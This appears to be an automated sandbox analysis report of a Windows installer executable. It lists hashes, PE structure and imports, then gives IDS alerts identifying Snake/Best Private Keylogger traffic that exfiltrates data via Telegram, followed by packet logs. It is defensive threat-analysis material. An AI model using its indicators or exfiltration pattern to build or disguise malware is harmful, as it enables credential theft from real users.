Encrypted:	false
SSDEEP:	12:8wl0asXowAOcQ/tz0/CSL6/cBnwgXl341DEDeG41DEDIRKQ1olfW+kjcmAa9IwRi:8xLDWLrFPjPM9izZMFypdqy
MD5:	988DEB0B4D8854FE2B6E9AC87B901082
SHA1:	EB7EF5DDDEAF071D71957F90489E2854D1FD65E3
SHA-256:	4365D73D86F0DA595081D7A2E319EC8205E91B2FBEFD3AE5231071601A0FF404
SHA-512:	2AC8E0B4647C10EC1D61F48F67CCC03849E6111C307F3429F520B4F8D386F3BFA4E264C41093F92247F0577E26E747885B7B321CF34F2113306F103965908B0A
Malicious:	false
Preview:	L..................F........................................................m....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.Z.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.V.i.l.k.a.a.r.e.t.s.............y..........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.962303183160449
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	grrezORe7h.exe
File size:	465'972 bytes
MD5:	fd7d65a4a49c3867970510443c8819d5
SHA1:	088fa33f1e46a544ddec2d2493895abbf358b1d3
SHA256:	ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f
SHA512:	39722036948fd74e97f6586122d86e2c7a4d16716fdd15020b73848345bcb5b3b75e1f956589fe4f6c4abfd658c20a712563b10abb701bfab06c8d417b0a0aec
SSDEEP:	12288:I5Az4Ci9QbB5i3M5vmdmKEBmnSXu7Jj1JK8s5FEeKB:ZAiK3cvmPEBmnSXu7Jj1JiceI
TLSH:	C3A4230091A0C103D1B316340C755AFA7B3AA705EBA87F1BD79C3E5E7D31A92D82E9D9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x4032a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d4b94e8ee3f620a89d114b9da4b31873

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A300h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B0h]
call dword ptr [004080ACh]
cmp ax, 00000006h
je 00007F676566B7D3h
push ebp
call 00007F676566E916h
cmp eax, ebp
je 00007F676566B7C9h
push 00000C00h
call eax
push ebx
push edi
push 0040A2F4h
call 00007F676566E893h
push 0040A2ECh
call 00007F676566E889h
push 0040A2E0h
call 00007F676566E87Fh
push 00000009h
call 00007F676566E8E4h
push 00000007h
call 00007F676566E8DDh
mov dword ptr [00434F04h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [00434FB8h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B228h
call dword ptr [0040818Ch]
push 0040A2C8h
push 00433F00h
call 00007F676566E4CAh
call dword ptr [004080A8h]
mov ebx, 0043F000h
push eax
push ebx
call 00007F676566E4B8h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85c8	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x11e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x637c	0x6400	83ff228d6dae8dd738eb2f78afbc793f	False	0.672421875	data	6.491609540807675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x147c	0x1600	d9f9b0b330e238260616b62a7a3cac09	False	0.42933238636363635	data	4.973928345594701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	3f2b05c8fbb8b2e4c9c89e93d30e7252	False	0.53125	data	4.133631086111171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x28000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5d000	0x11e0	0x1200	20639f4e7c421f5379e2fb9ea4a1530d	False	0.3684895833333333	data	4.485045860065118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x5d268	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x5d5d0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x5d8b8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x5da00	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x5db40	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5dc40	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5dd60	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5de28	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5de88	0x14	data	English	United States	1.2
RT_MANIFEST	0x5dea0	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T07:23:54.925350+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	142.250.181.238	443	TCP
2025-01-11T07:24:00.060011+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49754	193.122.6.168	80	TCP
2025-01-11T07:24:07.638244+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49754	193.122.6.168	80	TCP
2025-01-11T07:24:08.255544+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49810	149.154.167.220	443	TCP
2025-01-11T07:24:08.519741+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49810	149.154.167.220	443	TCP
2025-01-11T07:24:09.388272+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49816	193.122.6.168	80	TCP
2025-01-11T07:24:09.963106+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49822	149.154.167.220	443	TCP
2025-01-11T07:24:10.283485+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49822	149.154.167.220	443	TCP
2025-01-11T07:24:11.564905+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49832	149.154.167.220	443	TCP
2025-01-11T07:24:11.951960+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49832	149.154.167.220	443	TCP
2025-01-11T07:24:13.221140+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49844	149.154.167.220	443	TCP
2025-01-11T07:24:13.496886+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49844	149.154.167.220	443	TCP
2025-01-11T07:24:14.745401+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49856	149.154.167.220	443	TCP
2025-01-11T07:24:14.970989+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49856	149.154.167.220	443	TCP
2025-01-11T07:24:16.253793+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49868	149.154.167.220	443	TCP
2025-01-11T07:24:16.640414+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49868	149.154.167.220	443	TCP
2025-01-11T07:24:18.016898+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49883	149.154.167.220	443	TCP
2025-01-11T07:24:18.318060+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49883	149.154.167.220	443	TCP
2025-01-11T07:24:19.603749+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49895	149.154.167.220	443	TCP
2025-01-11T07:24:19.910084+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49895	149.154.167.220	443	TCP
2025-01-11T07:24:21.153204+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49904	149.154.167.220	443	TCP
2025-01-11T07:24:21.383818+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49904	149.154.167.220	443	TCP
2025-01-11T07:24:22.653324+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49917	149.154.167.220	443	TCP
2025-01-11T07:24:22.944003+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49917	149.154.167.220	443	TCP
2025-01-11T07:24:24.220534+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49933	149.154.167.220	443	TCP
2025-01-11T07:24:24.576918+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49933	149.154.167.220	443	TCP
2025-01-11T07:24:25.863209+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49945	149.154.167.220	443	TCP
2025-01-11T07:24:26.128064+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49945	149.154.167.220	443	TCP
2025-01-11T07:24:27.392861+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49957	149.154.167.220	443	TCP
2025-01-11T07:24:27.614794+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49957	149.154.167.220	443	TCP
2025-01-11T07:24:28.888480+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49969	149.154.167.220	443	TCP
2025-01-11T07:24:29.303334+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49969	149.154.167.220	443	TCP
2025-01-11T07:24:30.572353+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49981	149.154.167.220	443	TCP
2025-01-11T07:24:30.788758+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49981	149.154.167.220	443	TCP
2025-01-11T07:24:32.063146+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49993	149.154.167.220	443	TCP
2025-01-11T07:24:32.449590+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49993	149.154.167.220	443	TCP
2025-01-11T07:24:33.724104+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50005	149.154.167.220	443	TCP
2025-01-11T07:24:34.070876+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50005	149.154.167.220	443	TCP
2025-01-11T07:24:35.369425+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50017	149.154.167.220	443	TCP
2025-01-11T07:24:35.664434+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50017	149.154.167.220	443	TCP
2025-01-11T07:24:36.929721+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50029	149.154.167.220	443	TCP
2025-01-11T07:24:37.245878+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50029	149.154.167.220	443	TCP
2025-01-11T07:24:38.524909+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50041	149.154.167.220	443	TCP
2025-01-11T07:24:38.795552+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50041	149.154.167.220	443	TCP
2025-01-11T07:24:40.082855+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50046	149.154.167.220	443	TCP
2025-01-11T07:24:40.334295+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50046	149.154.167.220	443	TCP
2025-01-11T07:24:41.601157+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50048	149.154.167.220	443	TCP
2025-01-11T07:24:41.908821+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50048	149.154.167.220	443	TCP
2025-01-11T07:24:43.185350+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50050	149.154.167.220	443	TCP
2025-01-11T07:24:43.473412+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50050	149.154.167.220	443	TCP
2025-01-11T07:24:44.788587+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50052	149.154.167.220	443	TCP
2025-01-11T07:24:45.068943+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50052	149.154.167.220	443	TCP
2025-01-11T07:24:46.849422+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50054	149.154.167.220	443	TCP
2025-01-11T07:24:47.160287+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50054	149.154.167.220	443	TCP
2025-01-11T07:24:48.787594+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50056	149.154.167.220	443	TCP
2025-01-11T07:24:49.080965+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50056	149.154.167.220	443	TCP
2025-01-11T07:24:50.349263+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50058	149.154.167.220	443	TCP
2025-01-11T07:24:50.562922+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50058	149.154.167.220	443	TCP
2025-01-11T07:24:51.822317+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50060	149.154.167.220	443	TCP
2025-01-11T07:24:52.212753+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50060	149.154.167.220	443	TCP
2025-01-11T07:24:53.875530+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50062	149.154.167.220	443	TCP
2025-01-11T07:24:54.266130+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50062	149.154.167.220	443	TCP
2025-01-11T07:24:55.615119+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50064	149.154.167.220	443	TCP
2025-01-11T07:24:56.121056+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50064	149.154.167.220	443	TCP
2025-01-11T07:24:58.138782+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50066	149.154.167.220	443	TCP
2025-01-11T07:24:58.424476+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50066	149.154.167.220	443	TCP
2025-01-11T07:24:59.729945+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50068	149.154.167.220	443	TCP
2025-01-11T07:24:59.947306+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50068	149.154.167.220	443	TCP
2025-01-11T07:25:02.358363+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50070	149.154.167.220	443	TCP
2025-01-11T07:25:02.686939+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50070	149.154.167.220	443	TCP
2025-01-11T07:25:12.622587+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	50072	149.154.167.220	443	TCP
2025-01-11T07:25:13.005997+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	50072	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:23:53.737554073 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:53.737617970 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:53.737709045 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:53.828685045 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:53.828769922 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.474540949 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.474718094 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.475682974 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.475763083 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.562638998 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.562678099 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.563652039 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.564405918 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.616000891 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.659333944 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.925348997 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.926131010 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.926230907 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.934051037 CET	49736	443	192.168.2.4	142.250.181.238
Jan 11, 2025 07:23:54.934081078 CET	443	49736	142.250.181.238	192.168.2.4
Jan 11, 2025 07:23:54.973583937 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:54.973597050 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:54.973680019 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:54.974001884 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:54.974016905 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:55.623271942 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:55.623420954 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:55.627594948 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:55.627619028 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:55.627897024 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:55.627966881 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:55.628353119 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:55.671334028 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.907965899 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.908077955 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.914000034 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.914093018 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.926532984 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.926670074 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.926681042 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.927052021 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.932765007 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.932995081 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.997004032 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.997059107 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.997082949 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.997103930 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.997126102 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.997148037 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.997148037 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.997180939 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:57.997358084 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:57.997407913 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.003020048 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.003103018 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.003139019 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.003186941 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.009361029 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.009500980 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.009519100 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.009569883 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.015672922 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.015727043 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.015737057 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.015778065 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.021821976 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.021928072 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.021945000 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.021998882 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.028117895 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.028217077 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.028225899 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.028285027 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.034411907 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.034524918 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.034532070 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.034586906 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.040173054 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.040275097 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.040285110 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.040335894 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.045977116 CET	443	49737	142.250.185.225	192.168.2.4
